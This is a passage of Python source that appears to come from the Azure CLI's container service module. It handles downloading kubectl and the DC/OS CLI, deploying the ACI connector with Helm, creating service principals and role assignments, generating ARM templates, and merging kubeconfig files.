remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Unsupported platform: {}'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Unsupported platform: {}'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` command can be found. Two options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location against the available ACI regions
_validate_aci_location(norm_location)
# Get the credentials from an AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from an AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
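# Illustrative use (hypothetical values): _get_role_property works for both
# dict-shaped assignments and SDK model objects, e.g.
#   _get_role_property({'scope': '/subscriptions/0000'}, 'scope') -> '/subscriptions/0000'
#   _get_role_property(assignment_model, 'principal_id')          -> assignment_model.principal_id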
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
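# Example of the generated prefix (placeholder subscription id): for
# name='myCluster', resource_group_name='my-rg' and a subscription id starting
# with '012345', _get_default_dns_prefix returns 'myCluster-my-rg-012345'.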
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
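# Illustrative return value when --windows is requested (placeholder credentials):
#   {"adminUsername": "azureuser", "adminPassword": "<6+ character password>"}
# For Linux-only clusters the function returns None.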
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
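# Sketch of what the sshMaster0 output evaluates to at deployment time
# (placeholder FQDN): non-Kubernetes orchestrators get port 2200 and an extra
# agentFQDN output, e.g.
#   'ssh azureuser@myclustermgmt.eastus.cloudapp.azure.com -A -p 2200'
# while Kubernetes clusters keep the default port 22.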
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'.
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for agent pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or the specified version is not supported,
# override it based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
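# For reference, acsServicePrincipal.json is keyed by subscription id and is
# written with 0600 permissions; the stored shape looks like (placeholders):
#   {"<subscription-id>": {"service_principal": "<app-id>", "client_secret": "<secret>"}}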
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType, get_sdk
DeploymentProperties = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'DeploymentProperties', mod='models')
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
# validate the addition before indexing into it
